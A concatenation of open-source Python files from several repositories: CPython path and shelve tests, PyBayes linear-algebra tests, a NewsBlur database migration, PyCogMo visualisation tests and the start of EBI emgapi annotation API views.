nonascii) check('$bar%s bar' % nonascii, '$bar%s bar' % nonascii) check('$spam}bar', '%s}bar' % nonascii) 
check(os.fsencode(nonascii), os.fsencode(nonascii)) check(b'$spam bar', os.fsencode('%s bar' % nonascii)) check(b'${spam}bar', os.fsencode('%sbar' % nonascii)) check(os.fsencode('${%s}bar' % nonascii), os.fsencode('ham%sbar' % nonascii)) check(os.fsencode('$bar%s bar' % nonascii), os.fsencode('$bar%s bar' % nonascii)) check(b'$spam}bar', os.fsencode('%s}bar' % nonascii)) def test_abspath(self): self.assertIn("foo", self.pathmodule.abspath("foo")) with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertIn(b"foo", self.pathmodule.abspath(b"foo")) # Abspath returns bytes when the arg is bytes with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) for path in (b'', b'foo', b'f\xf2\xf2', b'/foo', b'C:\\'): self.assertIsInstance(self.pathmodule.abspath(path), bytes) def test_realpath(self): self.assertIn("foo", self.pathmodule.realpath("foo")) with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertIn(b"foo", self.pathmodule.realpath(b"foo")) def test_normpath_issue5827(self): # Make sure normpath preserves unicode for path in ('', '.', '/', '\\', '///foo/.//bar//'): self.assertIsInstance(self.pathmodule.normpath(path), str) def test_abspath_issue3426(self): # Check that abspath returns unicode when the arg is unicode # with both ASCII and non-ASCII cwds. abspath = self.pathmodule.abspath for path in ('', 'fuu', 'f\xf9\xf9', '/fuu', 'U:\\'): self.assertIsInstance(abspath(path), str) unicwd = '\xe7w\xf0' try: os.fsencode(unicwd) except (AttributeError, UnicodeEncodeError): # FS encoding is probably ASCII pass else: with support.temp_cwd(unicwd): for path in ('', 'fuu', 'f\xf9\xf9', '/fuu', 'U:\\'): self.assertIsInstance(abspath(path), str) def test_nonascii_abspath(self): if (support.TESTFN_UNDECODABLE # Mac OS X denies the creation of a directory with an invalid # UTF-8 name. 
Windows allows to create a directory with an # arbitrary bytes name, but fails to enter this directory # (when the bytes name is used). and sys.platform not in ('win32', 'darwin')): name = support.TESTFN_UNDECODABLE elif support.TESTFN_NONASCII: name = support.TESTFN_NONASCII else: self.skipTest("need support.TESTFN_NONASCII") with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) with support.temp_cwd(name): self.test_abspath() if __name__=="__main__": unittest.main()
lgpl-3.0
cdondrup/PyBayes
pybayes/tests/test_wrappers_linalg.py
1
1754
# Copyright (c) 2010 Matej Laitl <matej@laitl.cz> # Distributed under the terms of the GNU General Public License v2 or any # later version of the license, at your option. """Tests for wrappers._linalg""" import math import numpy as np import pybayes.wrappers._linalg as linalg from support import PbTestCase def test_inv_func(self): """Work-around so that this function can be annotated in .pxd""" # source data arrays = [ np.array([[ 2.]]), np.array([[ 0., 2.], [ 3., 0.]]), np.array([[ 1., -2.], [-4., 9.]]), np.array([[10., 11.], [100., 111.]]), # near singular np.array([[1., 2., -3.], [1., -2., 3.], [-1., 2., 3.]]) ] # test that A * inv(A) = I within machine precision for A in arrays: iA = linalg.inv(A) E = np.eye(A.shape[0]) E1 = np.dot(A, iA) E2 = np.dot(iA, A) self.assertApproxEqual(E1, E) self.assertApproxEqual(E2, E) def test_slogdet_func(self): """Work-around so that this function can be annotated in .pxd""" arr = np.array([[1., 2.], [-3., 4.]]) res = math.log(linalg.det(arr)) self.assertApproxEqual(res, 2.30258509299) def test_cholesky_func(self): """Work-around so that this function can be annotated in .pxd""" arr = np.array([[ 4., 12., -16.], [ 12., 37., -43.], [-16., -43., 98.]]) res = linalg.cholesky(arr) self.assertApproxEqual(np.dot(res, res.T), arr) class TestWrappersLinalg(PbTestCase): def test_inv(self): test_inv_func(self) def test_slogdet(self): """Test that we emulate slogdet correctly""" test_slogdet_func(self) def test_cholesky(self): test_cholesky_func(self)
gpl-2.0
petecummings/NewsBlur
apps/feed_import/migrations/0004_remote_ip.py
18
5078
# encoding: utf-8 import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding field 'OAuthToken.remote_ip' db.add_column('feed_import_oauthtoken', 'remote_ip', self.gf('django.db.models.fields.CharField')(max_length=50, null=True, blank=True), keep_default=False) # Adding field 'OAuthToken.created_date' db.add_column('feed_import_oauthtoken', 'created_date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now), keep_default=False) def backwards(self, orm): # Deleting field 'OAuthToken.remote_ip' db.delete_column('feed_import_oauthtoken', 'remote_ip') # Deleting field 'OAuthToken.created_date' db.delete_column('feed_import_oauthtoken', 'created_date') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': 
('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'contenttypes.contenttype': { 'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'feed_import.oauthtoken': { 'Meta': {'object_name': 'OAuthToken'}, 'access_token': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'access_token_secret': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'created_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'remote_ip': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}), 
'request_token': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'request_token_secret': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'session_id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'}) } } complete_apps = ['feed_import']
mit
agravier/pycogmo
tests/visualisation_tests.py
1
13926
#!/usr/bin/env python2 # Copyright 2011, 2012 Alexandre Gravier (al.gravier@gmail) # This file is part of PyCogMo. # PyCogMo is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # PyCogMo is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with PyCogMo. If not, see <http://www.gnu.org/licenses/>. import itertools import logging from logging import NullHandler from mock import Mock, patch import multiprocessing from nose import with_setup from nose.tools import eq_, raises, timed, nottest import ui.graphical.visualisation from ui.graphical.visualisation import * from ui.graphical.visualisation import VisualisableNetwork as VN from ui.graphical.visualisation import VisualisableNetworkStructure as VNS import vtk multiprocessing.get_logger().addHandler(NullHandler()) DUMMY_LOGGER = logging.getLogger("testLogger") DUMMY_LOGGER.addHandler(NullHandler()) V = None # holder class ("namespace") fot the test variables class Tns(object): pass def setup_vns(): global V V = VNS() def setup_units(): Tns.l_id, Tns.l_x, Tns.l_y, Tns.l_z = xrange(5, 20), xrange(3, 18), \ xrange(0, 30, 2), list(itertools.chain([None], itertools.repeat(-1, 14))) Tns.vns_units = [Unit(u_id, x, y, z) for (u_id, x, y, z) in itertools.izip(Tns.l_id, Tns.l_x, Tns.l_y, Tns.l_z)] ################################################## # Testing the VisualisableNetworkStructure class # ################################################## ### template @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_(): assert False nottest(test_VNS_) ### template @with_setup(setup_units) 
@with_setup(setup_vns) def test_VNS___eq__(): "Equality of two VisualisableNetworkStructures." u1, u2 = Unit(1, 1, 2), Unit(2, 3, 2) V.add_population(iter(Tns.vns_units)) V.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) V.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) V.add_unit(u1, "bar") V.add_unit(u2, "foo") V.connect_maps("bar", "foo") w = VNS() w.add_unit(u2, "foo") w.add_population(iter(Tns.vns_units)) w.add_unit(u1, "bar") w.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) w.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) w.connect_maps("bar", "foo") assert V == w @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_not__eq__(): "Inequality of two VisualisableNetworkStructures." u1, u2 = Unit(1, 1, 2), Unit(2, 3, 2) V.add_population(iter(Tns.vns_units)) V.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) V.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) V.add_unit(u1, "bar") V.add_unit(u2, "foo") V.connect_maps("bar", "foo") w = VNS() w.add_unit(u2, "foo") w.add_population(iter(Tns.vns_units)) w.add_unit(u1, "bar") w.connect_units(Tns.vns_units[0], Tns.vns_units[1], 1) # changed w.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) w.connect_maps("bar", "foo") x = VNS() x.add_unit(u2, "foo") x.add_population(iter(Tns.vns_units)) x.add_unit(u1, "lol") # changed x.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) x.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) x.connect_maps("bar", "foo") y = VNS() y.add_unit(u2, "foo") y.add_population(iter(Tns.vns_units)) y.add_unit(u1, "bar") # y.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) changed y.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) y.connect_maps("bar", "foo") z = VNS() z.add_unit(u2, "foo") z.add_population(iter(Tns.vns_units)) z.add_unit(u1, "bar") z.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) z.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) z.connect_maps("bar", "faz") # changed assert V != w assert V != x 
assert V != y assert V != z @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_add_unit(): "add_unit is complete and correct." assert len(V.units) == 0 i = 0 for u in Tns.vns_units: V.add_unit(u) u = V.units[i] assert (u.unit_id, u.x, u.y, u.z) == (Tns.l_id[i], Tns.l_x[i], Tns.l_y[i], Tns.l_z[i]) i += 1 assert len(V.units) == len(Tns.vns_units) V.assign_unit_to_map = Mock() V.add_unit(Unit(-1, 1, 2), "bar") assert V.assign_unit_to_map.called @raises(UnitNotFoundError) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_assign_unit_to_map_raises_(): "assign_unit_to_map raises an exception on inexistent unit." V.assign_unit_to_map(Tns.vns_units[0], "foo") @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_assign_unit_to_map(): "The mapping of units assignments to maps gets filled." V.add_unit(Tns.vns_units[0], "bar") V.add_unit(Tns.vns_units[1], "bar") assert V.maps["bar"] == [Tns.vns_units[0].unit_id, Tns.vns_units[1].unit_id] @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_add_population(): "add_population completeness and correctness." V.add_population(iter(Tns.vns_units)) assert set(V.units) == set(Tns.vns_units) @raises(UnitNotFoundError) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_units_inexistent_id(): "connect_units with inexistent units raises UnitNotFoundError." V.connect_units(Tns.vns_units[0].unit_id, Tns.vns_units[1].unit_id, 1) @raises(UnitNotFoundError) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_units_inexistent_unit(): "connect_units with inexistent units raises UnitNotFoundError." V.connect_units(Tns.vns_units[0], Tns.vns_units[1], 1) @raises(WeightOutOfRangeError) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_units_wrong_weight(): "connect_units with incorrect weight raises WeightOutOfRangeError." 
V.add_population(iter(Tns.vns_units)) V.connect_units(Tns.vns_units[0], Tns.vns_units[1], 2) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_units(): "connect_units correctly modifies units_conn." V.add_population(iter(Tns.vns_units)) V.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) V.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) id0, id1 = Tns.vns_units[0].unit_id, Tns.vns_units[1].unit_id assert set(V.units_conn) == set([(id0, id1, -1), (id1, id0, 0.3)]) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_units_list(): "connect_units_list correctly modifies units_conn." V.connect_units = Mock() V.add_population(iter(Tns.vns_units)) c_l = itertools.izip([Tns.l_id, reversed(Tns.l_id), itertools.repeat(1)]) V.connect_units_list(c_l) assert set(c_l) == set(V.units_conn) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_maps(): "connect_maps correctly modifies maps_conn." V.add_unit(Unit(1, 1, 2), "bar") V.add_unit(Unit(2, 3, 2), "foo") V.connect_maps("bar", "foo") assert V.maps_conn == [("bar", "foo")] ####################### # VisualisableNetwork # ####################### def setup_vn(): setup_vns() Tns.p1_l_id, Tns.p1_l_x, Tns.p1_l_y, Tns.p1_l_z = range(0, 15*15), range(3, 18)*15, \ range(0,30,2)*15, itertools.repeat(-1,15*15); Tns.p1_l_y.sort() Tns.p1_vns_units = [Unit(u_id, x, y, z) for (u_id, x, y, z) in itertools.izip(Tns.p1_l_id, Tns.p1_l_x, Tns.p1_l_y, Tns.p1_l_z)] it = iter(Tns.p1_vns_units) V.add_population(it, "pop") Tns.p2_l_id, Tns.p2_l_x, Tns.p2_l_y, Tns.p2_l_z = range(15*15+3, 15*15*2+3), range(0, 15)*15, \ range(0,30,2)*15, itertools.repeat(0,15*15); Tns.p2_l_y.sort() Tns.p2_vns_units = [Unit(u_id, x, y, z) for (u_id, x, y, z) in itertools.izip(Tns.p2_l_id, Tns.p2_l_x, Tns.p2_l_y, Tns.p2_l_z)] it2 = iter(Tns.p2_vns_units) V.add_population(it2, "pop2") V.connect_units(Tns.p1_vns_units[0], Tns.p2_vns_units[1], -1) V.connect_units(Tns.p1_vns_units[1], Tns.p2_vns_units[0], 0.3) 
Tns.vn = VisualisableNetwork(V) def main(): setup_vn() aPolyVertexGrid1 = Tns.vn.represent_map("pop")[0] Tns.vn.update_scalars([a/20. for a in Tns.p1_l_x], [aPolyVertexGrid1], [len(Tns.p1_l_id)]) aPolyVertexGrid2 = Tns.vn.represent_map("pop2")[0] # aPolyVertexActor = Tns.vn.make_actor_for_grid(aPolyVertexGrid) # aPolyVertexActor2 = Tns.vn.make_actor_for_grid(aPolyVertexGrid2) lvl_to_g = {0:[aPolyVertexGrid1, aPolyVertexGrid2]} #lvl_to_g = Tns.vn.levels_to_grids() all_actors = Tns.vn.make_all_actors(lvl_to_g) # Create the usual rendering stuff. ren = vtk.vtkRenderer() renWin = vtk.vtkRenderWindow() renWin.AddRenderer(ren) renWin.SetSize(1024, 768) iren = vtk.vtkRenderWindowInteractor() iren.SetRenderWindow(renWin) ren.SetBackground(.0, .0, .0) for a in all_actors: ren.AddActor(a) ren.ResetCamera() ren.GetActiveCamera().Azimuth(00) ren.GetActiveCamera().Elevation(-40) ren.GetActiveCamera().Dolly(0) ren.ResetCameraClippingRange() # Render the scene and start interaction. iren.Initialize() renWin.Render() import time time.sleep(0.1) iren.Start() if __name__ == "__main__": main() ########################### # general setup functions # ########################### def setup_child_conn_and_callback(): Tns.parent_conn, Tns.child_conn = multiprocessing.Pipe() Tns.vtc = vtkTimerCallback(Tns.child_conn) def setup_patch_visualisation_functions(): Tns.setup_vis_patch = \ patch("ui.graphical.visualisation.setup_visualisation") Tns.add_actors_patch = \ patch("ui.graphical.visualisation.add_actors_to_scene") Tns.prepare_env_patch = \ patch("ui.graphical.visualisation.prepare_render_env") Tns.setup_timer_patch = \ patch("ui.graphical.visualisation.setup_timer") Tns.setup_vis_mock = Tns.setup_vis_patch.start() Tns.setup_vis_mock.return_value = (Mock(), Mock(), Mock()) Tns.add_actors_mock = Tns.add_actors_patch.start() Tns.prepare_env_mock = Tns.prepare_env_patch.start() Tns.setup_timer_mock = Tns.setup_timer_patch.start() def teardown_patch_visualisation_functions(): 
Tns.setup_vis_patch.stop() Tns.setup_vis_mock = None Tns.add_actors_patch.stop() Tns.add_actors_mock = None Tns.prepare_env_patch.stop() Tns.prepare_env_mock = None Tns.setup_timer_patch.stop() Tns.setup_timer_mock = None @timed(1) @with_setup(setup_child_conn_and_callback) def test_vtkTimerCallback_execute_does_not_block(): "vtkTimerCallback.execute doesn't block on empty pipe." p = multiprocessing.Process( target=Tns.vtc.execute, args=(Mock(), Mock())) p.start() p.join(2) @with_setup(setup_patch_visualisation_functions, teardown_patch_visualisation_functions) def test_visualisation_process_f_side_effects(): """The process initialization function calls all setup functions.""" global LOGGER mock_pipe, mock_logger = Mock(), Mock() visualisation_process_f(mock_pipe, mock_logger) ui.graphical.visualisation.setup_timer = Mock(return_value=1) assert Tns.setup_vis_mock.called assert ui.graphical.visualisation.LOGGER is mock_logger assert Tns.setup_timer_mock.called def test_setup_visualisation(): """Return values are renderer, window and interactor linked together.""" r, w, i = setup_visualisation() assert isinstance(r, vtk.vtkRenderer) assert isinstance(w, vtk.vtkRenderWindow) assert isinstance(i, vtk.vtkRenderWindowInteractor) assert r is w.GetRenderers().GetFirstRenderer() assert w is i.GetRenderWindow() def test_map_source_object(): "Returns actor -> mapper -> object." obj = vtk.vtkPointSource() m, a = map_source_object(obj) assert isinstance(m.GetInput(), vtk.vtkObject) assert m is a.GetMapper() def test_add_actors_to_scene(): "add_actors_to_scene calls renderer.AddActor for all actors." r = Mock() r.AddActor = Mock(spec=vtk.vtkRenderer.AddActor) add_actors_to_scene(r, [1]) r.AddActor.assert_called_with(1) r = Mock() add_actors_to_scene(r, [2, 3, 4]) assert r.method_calls == [("AddActor", (2,)), ("AddActor", (3,)), ("AddActor", (4,))] def test_prepare_render_env(): "prepare_render_env calls interactor.Initialize and win.Render." 
m = Mock() prepare_render_env(m, m) assert m.Initialize.called assert m.Render.called def test_setup_timer(): vtkTimerCallback_patch = \ patch("ui.graphical.visualisation.vtkTimerCallback") vtkTimerCallback_mock = vtkTimerCallback_patch.start() mock_wi, mock_ic, mock_callback = Mock(), Mock(), Mock() vtkTimerCallback_mock.return_value = mock_callback setup_timer(mock_wi, mock_ic) vtkTimerCallback_patch.stop() assert vtkTimerCallback_mock.call_args == ((mock_ic,),) assert mock_wi.method_calls[0] == ("AddObserver", ("TimerEvent", mock_callback.execute), {}) assert mock_wi.method_calls[1][0] == "CreateRepeatingTimer" ####################################### # Network structure drawing functions # ####################################### # Template @with_setup() def test_(): assert False nottest(test_) # Template # TODO
gpl-3.0
MattsFleaMarket/python-for-android
python3-alpha/python3-src/Lib/test/test_shelve.py
57
5834
import unittest import shelve import glob from test import support from collections import MutableMapping from test.test_dbm import dbm_iterator def L1(s): return s.decode("latin-1") class byteskeydict(MutableMapping): "Mapping that supports bytes keys" def __init__(self): self.d = {} def __getitem__(self, key): return self.d[L1(key)] def __setitem__(self, key, value): self.d[L1(key)] = value def __delitem__(self, key): del self.d[L1(key)] def __len__(self): return len(self.d) def iterkeys(self): for k in self.d.keys(): yield k.encode("latin-1") __iter__ = iterkeys def keys(self): return list(self.iterkeys()) def copy(self): return byteskeydict(self.d) class TestCase(unittest.TestCase): fn = "shelftemp.db" def tearDown(self): for f in glob.glob(self.fn+"*"): support.unlink(f) def test_close(self): d1 = {} s = shelve.Shelf(d1, protocol=2, writeback=False) s['key1'] = [1,2,3,4] self.assertEqual(s['key1'], [1,2,3,4]) self.assertEqual(len(s), 1) s.close() self.assertRaises(ValueError, len, s) try: s['key1'] except ValueError: pass else: self.fail('Closed shelf should not find a key') def test_ascii_file_shelf(self): s = shelve.open(self.fn, protocol=0) try: s['key1'] = (1,2,3,4) self.assertEqual(s['key1'], (1,2,3,4)) finally: s.close() def test_binary_file_shelf(self): s = shelve.open(self.fn, protocol=1) try: s['key1'] = (1,2,3,4) self.assertEqual(s['key1'], (1,2,3,4)) finally: s.close() def test_proto2_file_shelf(self): s = shelve.open(self.fn, protocol=2) try: s['key1'] = (1,2,3,4) self.assertEqual(s['key1'], (1,2,3,4)) finally: s.close() def test_in_memory_shelf(self): d1 = byteskeydict() s = shelve.Shelf(d1, protocol=0) s['key1'] = (1,2,3,4) self.assertEqual(s['key1'], (1,2,3,4)) s.close() d2 = byteskeydict() s = shelve.Shelf(d2, protocol=1) s['key1'] = (1,2,3,4) self.assertEqual(s['key1'], (1,2,3,4)) s.close() self.assertEqual(len(d1), 1) self.assertEqual(len(d2), 1) self.assertNotEqual(d1.items(), d2.items()) def test_mutable_entry(self): d1 = byteskeydict() s = 
shelve.Shelf(d1, protocol=2, writeback=False) s['key1'] = [1,2,3,4] self.assertEqual(s['key1'], [1,2,3,4]) s['key1'].append(5) self.assertEqual(s['key1'], [1,2,3,4]) s.close() d2 = byteskeydict() s = shelve.Shelf(d2, protocol=2, writeback=True) s['key1'] = [1,2,3,4] self.assertEqual(s['key1'], [1,2,3,4]) s['key1'].append(5) self.assertEqual(s['key1'], [1,2,3,4,5]) s.close() self.assertEqual(len(d1), 1) self.assertEqual(len(d2), 1) def test_keyencoding(self): d = {} key = 'Pöp' # the default keyencoding is utf-8 shelve.Shelf(d)[key] = [1] self.assertIn(key.encode('utf-8'), d) # but a different one can be given shelve.Shelf(d, keyencoding='latin1')[key] = [1] self.assertIn(key.encode('latin1'), d) # with all consequences s = shelve.Shelf(d, keyencoding='ascii') self.assertRaises(UnicodeEncodeError, s.__setitem__, key, [1]) def test_writeback_also_writes_immediately(self): # Issue 5754 d = {} key = 'key' encodedkey = key.encode('utf-8') s = shelve.Shelf(d, writeback=True) s[key] = [1] p1 = d[encodedkey] # Will give a KeyError if backing store not updated s['key'].append(2) s.close() p2 = d[encodedkey] self.assertNotEqual(p1, p2) # Write creates new object in store from test import mapping_tests class TestShelveBase(mapping_tests.BasicTestMappingProtocol): fn = "shelftemp.db" counter = 0 def __init__(self, *args, **kw): self._db = [] mapping_tests.BasicTestMappingProtocol.__init__(self, *args, **kw) type2test = shelve.Shelf def _reference(self): return {"key1":"value1", "key2":2, "key3":(1,2,3)} def _empty_mapping(self): if self._in_mem: x= shelve.Shelf(byteskeydict(), **self._args) else: self.counter+=1 x= shelve.open(self.fn+str(self.counter), **self._args) self._db.append(x) return x def tearDown(self): for db in self._db: db.close() self._db = [] if not self._in_mem: for f in glob.glob(self.fn+"*"): support.unlink(f) class TestAsciiFileShelve(TestShelveBase): _args={'protocol':0} _in_mem = False class TestBinaryFileShelve(TestShelveBase): _args={'protocol':1} 
_in_mem = False class TestProto2FileShelve(TestShelveBase): _args={'protocol':2} _in_mem = False class TestAsciiMemShelve(TestShelveBase): _args={'protocol':0} _in_mem = True class TestBinaryMemShelve(TestShelveBase): _args={'protocol':1} _in_mem = True class TestProto2MemShelve(TestShelveBase): _args={'protocol':2} _in_mem = True def test_main(): for module in dbm_iterator(): support.run_unittest( TestAsciiFileShelve, TestBinaryFileShelve, TestProto2FileShelve, TestAsciiMemShelve, TestBinaryMemShelve, TestProto2MemShelve, TestCase ) if __name__ == "__main__": test_main()
apache-2.0
EBI-Metagenomics/emgapi
emgapianns/views.py
1
33502
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright 2019 EMBL - European Bioinformatics Institute # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import io import logging import urllib import pysam from django.conf import settings from django.db.models import Q from mongoengine.queryset.visitor import Q as M_Q from django.http import Http404, HttpResponse from django.shortcuts import get_object_or_404 from django_filters.rest_framework import DjangoFilterBackend from rest_framework import filters from rest_framework.decorators import action from rest_framework.views import APIView from rest_framework.response import Response from rest_framework.settings import api_settings from rest_framework import viewsets, status from rest_framework.exceptions import NotFound from rest_framework.pagination import CursorPagination from mongoengine.base.datastructures import EmbeddedDocumentList from emgapi import serializers as emg_serializers from emgapi import models as emg_models from emgapi import filters as emg_filters from emgapi import utils as emg_utils from . import serializers as m_serializers from . import models as m_models from . import pagination as m_pagination from . import viewsets as m_viewsets from . import mixins as m_mixins logger = logging.getLogger(__name__) class GoTermViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of GO terms. 
""" annotation_model = m_models.GoTerm serializer_class = m_serializers.GoTermSerializer lookup_field = 'accession' lookup_value_regex = 'GO:[0-9]+' def get_serializer_class(self): return super(GoTermViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of GO terms Example: --- `/annotations/go-terms` """ return super(GoTermViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves GO term Example: --- `/annotations/go-terms/GO:009579` """ return super(GoTermViewSet, self) \ .retrieve(request, *args, **kwargs) class InterproIdentifierViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of InterPro identifiers. """ annotation_model = m_models.InterproIdentifier serializer_class = m_serializers.InterproIdentifierSerializer lookup_field = 'accession' lookup_value_regex = 'IPR[0-9]+' def get_serializer_class(self): return super(InterproIdentifierViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of InterPro identifier Example: --- `/annotations/interpro-identifier` """ return super(InterproIdentifierViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves InterPro identifier Example: --- `/annotations/interpro-identifier/IPR020405` """ return super(InterproIdentifierViewSet, self) \ .retrieve(request, *args, **kwargs) class KeggModuleViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of KEEG modules. 
""" annotation_model = m_models.KeggModule serializer_class = m_serializers.KeggModuleSerializer lookup_field = 'accession' lookup_value_regex = 'M[0-9]+' def get_serializer_class(self): return super(KeggModuleViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of KEGG modules Example: --- `/annotations/kegg-modules` """ return super(KeggModuleViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves KEGG module Example: --- `/annotations/kegg-modules/M00127` """ return super(KeggModuleViewSet, self) \ .retrieve(request, *args, **kwargs) class PfamEntryViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of Pfem entries. """ annotation_model = m_models.PfamEntry serializer_class = m_serializers.PfamSerializer lookup_field = 'accession' lookup_value_regex = 'PF[0-9]+' def get_serializer_class(self): return super(PfamEntryViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of Pfam entries Example: --- `/annotations/pfam-entries` """ return super(PfamEntryViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves a Pfram entry Example: --- `/annotations/pfam-entry/P0001` """ return super(PfamEntryViewSet, self) \ .retrieve(request, *args, **kwargs) class KeggOrthologViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of KEGG Ortholog. 
